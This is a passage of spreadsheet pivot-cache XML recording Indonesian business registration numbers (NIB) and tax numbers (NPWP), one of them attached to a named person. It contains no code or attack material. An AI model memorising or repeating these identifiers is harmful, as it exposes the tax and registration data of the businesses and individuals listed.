    <x v="5230"/>
    <s v="npwp"/>
    <s v="07.651.025.4-033.000"/>
  </r>
  <r>
    <x v="5235"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5229"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5208"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5238"/>
    <s v="nib"/>
    <n v="9120006761426"/>
  </r>
  <r>
    <x v="5238"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5239"/>
    <s v="nib"/>
    <n v="1279000520565"/>
  </r>
  <r>
    <x v="5240"/>
    <s v="nib"/>
    <n v="1287000342048"/>
  </r>
  <r>
    <x v="5241"/>
    <s v="nib"/>
    <n v="1238000502953"/>
  </r>
  <r>
    <x v="5242"/>
    <s v="nib"/>
    <n v="8120100950352"/>
  </r>
  <r>
    <x v="5243"/>
    <s v="nib"/>
    <n v="1282000671544"/>
  </r>
  <r>
    <x v="5244"/>
    <s v="nib"/>
    <n v="203010142265"/>
  </r>
  <r>
    <x v="5232"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5135"/>
    <s v="npwp"/>
    <s v="93.995.474.9-202.000"/>
  </r>
  <r>
    <x v="5245"/>
    <s v="nib"/>
    <n v="9120006761426"/>
  </r>
  <r>
    <x v="5233"/>
    <s v="npwp"/>
    <n v="930490503303000"/>
  </r>
  <r>
    <x v="604"/>
    <s v="nib"/>
    <n v="220002780389"/>
  </r>
  <r>
    <x v="5246"/>
    <s v="nib"/>
    <n v="232010242022"/>
  </r>
  <r>
    <x v="5247"/>
    <s v="nib"/>
    <n v="9120304230146"/>
  </r>
  <r>
    <x v="5248"/>
    <s v="nib"/>
    <n v="9120304230146"/>
  </r>
  <r>
    <x v="5249"/>
    <s v="nib"/>
    <n v="8120014222965"/>
  </r>
  <r>
    <x v="5250"/>
    <s v="nib"/>
    <n v="220100581534"/>
  </r>
  <r>
    <x v="415"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="5251"/>
    <s v="nib"/>
    <n v="1286000553312"/>
  </r>
  <r>
    <x v="5252"/>
    <s v="nib"/>
    <n v="1286000553312"/>
  </r>
  <r>
    <x v="5253"/>
    <s v="nib"/>
    <n v="220101371093"/>
  </r>
  <r>
    <x v="5254"/>
    <s v="nib"/>
    <n v="218010230543"/>
  </r>
  <r>
    <x v="5242"/>
    <s v="npwp"/>
    <s v="02.919.715.9-823.000"/>
  </r>
  <r>
    <x v="5249"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5255"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5256"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5257"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5258"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5259"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5260"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5261"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5262"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5263"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5264"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5265"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5266"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5267"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5268"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5269"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5270"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5271"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5272"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5273"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5274"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5275"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5276"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5277"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5278"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5279"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5280"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5281"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5282"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5283"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5284"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5285"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5286"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5287"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5288"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5289"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5290"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5291"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5292"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5293"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5294"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5295"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5296"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5297"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5298"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5299"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5300"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5301"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5302"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5303"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5304"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5305"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5306"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5307"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5308"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5309"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5310"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5311"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5312"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5313"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5314"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5315"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5316"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5317"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5318"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5319"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5320"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5321"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5322"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5323"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5324"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5325"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5326"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5327"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5328"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5329"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5330"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5331"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5332"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5333"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5334"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5335"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5336"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5337"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5338"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5339"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5340"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5341"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5342"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5343"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5344"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5345"/>
    <s v="nib"/>
    <n v="2"/>
  </r>
  <r>
    <x v="5236"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5157"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5346"/>
    <s v="nib"/>
    <n v="9120304230146"/>
  </r>
  <r>
    <x v="5347"/>
    <s v="nib"/>
    <n v="9120304230146"/>
  </r>
  <r>
    <x v="5348"/>
    <s v="nib"/>
    <n v="220002141297"/>
  </r>
  <r>
    <x v="5349"/>
    <s v="nib"/>
    <n v="220002731857"/>
  </r>
  <r>
    <x v="5350"/>
    <s v="nib"/>
    <n v="1215000662018"/>
  </r>
  <r>
    <x v="5351"/>
    <s v="nib"/>
    <n v="220107772275"/>
  </r>
  <r>
    <x v="5352"/>
    <s v="nib"/>
    <n v="9120008601206"/>
  </r>
  <r>
    <x v="5353"/>
    <s v="nib"/>
    <n v="1276000611091"/>
  </r>
  <r>
    <x v="5354"/>
    <s v="nib"/>
    <n v="9120006160496"/>
  </r>
  <r>
    <x v="5228"/>
    <s v="npwp"/>
    <n v="961841228618000"/>
  </r>
  <r>
    <x v="5348"/>
    <s v="npwp"/>
    <s v="MANSUR USMAN (80.024.878.3-921.000)"/>
  </r>
  <r>
    <x v="5355"/>
    <s v="nib"/>
    <n v="1274000201655"/>
  </r>
  <r>
    <x v="549"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="5356"/>
    <s v="nib"/>
    <n v="220007893019"/>
  </r>
  <r>
    <x v="5357"/>
    <s v="nib"/>
    <n v="9120013130557"/>
  </r>
  <r>
    <x v="5353"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5358"/>
    <s v="nib"/>
    <n v="220000641923"/>
  </r>
  <r>
    <x v="5359"/>
    <s v="nib"/>
    <n v="9120004791701"/>
  </r>
  <r>
    <x v="5360"/>
    <s v="nib"/>
    <n v="8120314011896"/>
  </r>
  <r>
    <x v="5361"/>
    <s v="nib"/>
    <n v="1230000530727"/>
  </r>
  <r>
    <x v="5253"/>
    <s v="npwp"/>
    <s v="npwp"/>
  </r>
  <r>
    <x v="5362"/>
    <s v="nib"/>
    <n v="9120202951109"/>
  </r>
  <r>
    <x v="5363"/>
    <s v="nib"/>
    <n v="9120504132037"/>
  </r>
  <r>
    <x v="5364"/>
    <s v="nib"/>
    <n v="9120218152675"/>
  </r>
  <r>
    <x v="5365"/>
    <s v="nib"/>
    <n v="1298000632019"/>
  </r>
  <r>
    <x v="5347"/>
    <s v="npwp"/>
    <s v="66.569.558.1-805.000"/>
  </r>
  <r>
    <x v="5177"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5364"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5363"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5357"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5188"/>
    <s v="npwp"/>
    <n v="152211093214000"/>
  </r>
  <r>
    <x v="5366"/>
    <s v="nib"/>
    <n v="220003541304"/>
  </r>
  <r>
    <x v="5367"/>
    <s v="nib"/>
    <n v="220003541304"/>
  </r>
  <r>
    <x v="5368"/>
    <s v="nib"/>
    <n v="8120111021183"/>
  </r>
  <r>
    <x v="5369"/>
    <s v="nib"/>
    <n v="220000651856"/>
  </r>
  <r>
    <x v="5370"/>
    <s v="nib"/>
    <n v="1221000672143"/>
  </r>
  <r>
    <x v="5361"/>
    <s v="npwp"/>
    <s v="42.301.610.4-642.000"/>
  </r>
  <r>
    <x v="5371"/>
    <s v="nib"/>
    <n v="220201190688"/>
  </r>
  <r>
    <x v="5358"/>
    <s v="npwp"/>
    <n v="6.9854991200299995E+23"/>
  </r>
  <r>
    <x v="5000"/>
    <s v="npwp"/>
    <n v="902511047225000"/>
  </r>
  <r>
    <x v="5355"/>
    <s v="npwp"/>
    <s v="41.370.301.8-822.000"/>
  </r>
  <r>
    <x v="5372"/>
    <s v="nib"/>
    <n v="1203000542247"/>
  </r>
  <r>
    <x v="5191"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5373"/>
    <s v="nib"/>
    <n v="9120101120539"/>
  </r>
  <r>
    <x v="5354"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5374"/>
    <s v="nib"/>
    <n v="1230000632517"/>
  </r>
  <r>
    <x v="5375"/>
    <s v="nib"/>
    <n v="1255000331276"/>
  </r>
  <r>
    <x v="4320"/>
    <s v="npwp"/>
    <s v="31.523.522.6-402.000"/>
  </r>
  <r>
    <x v="5367"/>
    <s v="npwp"/>
    <s v="84.955.666.7-801.000"/>
  </r>
  <r>
    <x v="5371"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="5376"/>
    <s v="nib"/>
    <n v="1274000352438"/>
  </r>
  <r>
    <x v="5377"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5378"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5379"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5380"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5381"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5382"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5383"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5384"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5385"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5386"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5387"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5388"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5389"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5390"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5391"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5392"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5393"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5394"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5395"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5396"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5397"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5398"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5399"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5400"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5401"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5402"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5403"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5404"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5405"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5406"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5407"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5408"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5409"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5410"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5411"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5412"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5413"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5414"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5415"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5416"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5417"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5418"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5419"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5420"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5421"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5422"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5423"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5424"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5425"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5426"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5427"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5428"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5429"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5430"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5431"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5432"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5433"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5434"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5435"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5436"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5437"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5438"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5439"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5440"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5441"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5442"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5443"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5444"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5445"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5446"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5447"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5448"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5449"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5450"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5451"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5452"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5453"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5454"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5455"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5456"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5457"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5458"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5459"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5460"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5461"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5462"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5463"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5464"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5465"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5466"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5467"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5468"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5469"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5470"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5471"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5472"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5473"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5474"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5475"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5476"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5477"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5478"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5479"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5480"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5481"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5482"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5483"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5484"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5485"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5486"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5487"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5488"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5489"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5490"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5491"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5492"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5493"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5494"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5495"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5496"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5497"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5498"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5499"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5500"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5501"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5502"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5503"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5504"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5505"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5506"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5507"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5508"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5509"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5510"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5511"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5512"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5513"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5514"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5515"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5516"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5517"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5518"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5519"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5520"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5521"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5522"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5523"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5524"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5525"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5526"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5527"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5528"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5529"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5530"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5531"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5532"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5533"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5534"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5535"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5536"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5537"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5538"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5539"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5540"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5541"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5542"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5543"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5544"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5545"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5546"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5547"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5548"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5549"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5550"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5551"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5552"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5553"/>
    <s v="nib"/>
    <n v="1"/>
  </r>
  <r>
    <x v="5554"/>
    <s v="nib"/>
    <n v="1"/>
